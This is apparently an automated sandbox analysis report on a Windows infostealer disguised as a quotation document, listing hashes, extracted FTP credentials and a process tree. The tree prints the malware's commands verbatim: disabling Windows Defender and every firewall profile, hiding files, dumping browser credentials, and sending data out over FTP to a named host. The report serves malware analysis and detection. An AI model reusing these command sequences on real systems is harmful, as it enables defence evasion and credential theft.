Analysis

  • max time kernel
    131s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    09-07-2020 14:27

General

  • Target

    RFQ Request For Quotation.doc. .exe

  • Size

    1.0MB

  • MD5

    087a1ecc3d720b786d8cc8544bc469ed

  • SHA1

    721623d6904a1c9e8168c3f104840490b5b52491

  • SHA256

    dff0bf7c85f01cf94f21c7bdd224fe0b3d73dcad9cb38fa40eef4685c9bc63ab

  • SHA512

    ae12605396dc568f7da9d9fdfb5518bcedea190c0c7f3d39d9773c76fee41bc5f0daf966ca31bba6acccdc5be867e64a30c6c1deed2425713db1226c196d5981

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftps4.us.freehostia.com
  • Port:
    21
  • Username:
    jumshi
  • Password:
    winniebobo

Signatures

  • Executes dropped EXE 5 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Views/modifies file attributes 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 111 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Runs net.exe
  • Stops running service(s) 3 TTPs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Modifies service 2 TTPs 45 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RFQ Request For Quotation.doc. .exe
    "C:\Users\Admin\AppData\Local\Temp\RFQ Request For Quotation.doc. .exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1164
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\Adobe.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1288
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\Adobe03.bat" /quiet /norestart"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\SysWOW64\net.exe
          NET FILE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1632
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 FILE
            5⤵
              PID:796
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\adobel.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1120
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\adobe01.bat" /quiet /norestart"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1516
              • C:\Windows\SysWOW64\attrib.exe
                attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeD\Adobe INC\AadobeRead\"
                6⤵
                • Views/modifies file attributes
                PID:1380
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\"
                6⤵
                • Enumerates system info in registry
                PID:1820
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\adob02.bat"
                6⤵
                • Suspicious use of WriteProcessMemory
                • Loads dropped DLL
                PID:1368
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low"
                  7⤵
                  • Views/modifies file attributes
                  PID:1596
                • C:\Windows\SysWOW64\sc.exe
                  sc config WinDefend start= disabled
                  7⤵
                    PID:1560
                  • C:\Windows\SysWOW64\sc.exe
                    sc stop WinDefend
                    7⤵
                      PID:1892
                    • C:\Windows\SysWOW64\msiexec.exe
                      msiexec /uninstall windowsdefender.msi /quiet /log uninstall.log
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1924
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set notifications mode=DISABLE
                      7⤵
                      • Modifies service
                      PID:1948
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode disable
                      7⤵
                      • Modifies service
                      PID:1032
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set domainprofile state off
                      7⤵
                      • Modifies service
                      PID:1088
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set currentprofile state off
                      7⤵
                      • Modifies service
                      PID:1332
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set profiles state off
                      7⤵
                      • Modifies service
                      PID:760
                    • C:\Windows\SysWOW64\netsh.exe
                      NetSh Advfirewall set allprofiles state off
                      7⤵
                      • Modifies service
                      PID:1524
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set notifications mode = disable profile = all
                      7⤵
                      • Modifies service
                      PID:1840
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set publicprofile state off
                      7⤵
                      • Modifies service
                      PID:1080
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall set privateprofile state off
                      7⤵
                      • Modifies service
                      PID:316
                    • C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\adobepdf.exe
                      adobepdf.exe /stext 033.033
                      7⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1164
                    • C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\adobedf.exe
                      adobedf.exe /stext 022.022
                      7⤵
                      • Executes dropped EXE
                      PID:1576
                    • C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\ancp.exe
                      ancp -u jumshi -p winniebobo -m -F -R ftps4.us.freehostia.com /ALOG003 *.192
                      7⤵
                      • Executes dropped EXE
                      PID:1988
                    • C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\ancp.exe
                      ancp -u jumshi -p winniebobo -m -F -R ftps4.us.freehostia.com /ALOG003 *.193
                      7⤵
                      • Executes dropped EXE
                      PID:1936
                    • C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\Areada.exe
                      Areada 5359
                      7⤵
                      • Executes dropped EXE
                      PID:1944
        • C:\Windows\SysWOW64\DllHost.exe
          C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
          1⤵
          • Suspicious use of FindShellTrayWindow
          PID:1872
        • C:\Windows\system32\msiexec.exe
          C:\Windows\system32\msiexec.exe /V
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1880

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1120-20-0x0000000002590000-0x0000000002594000-memory.dmp

          Filesize

          16KB

        • memory/1288-21-0x0000000002670000-0x0000000002674000-memory.dmp

          Filesize

          16KB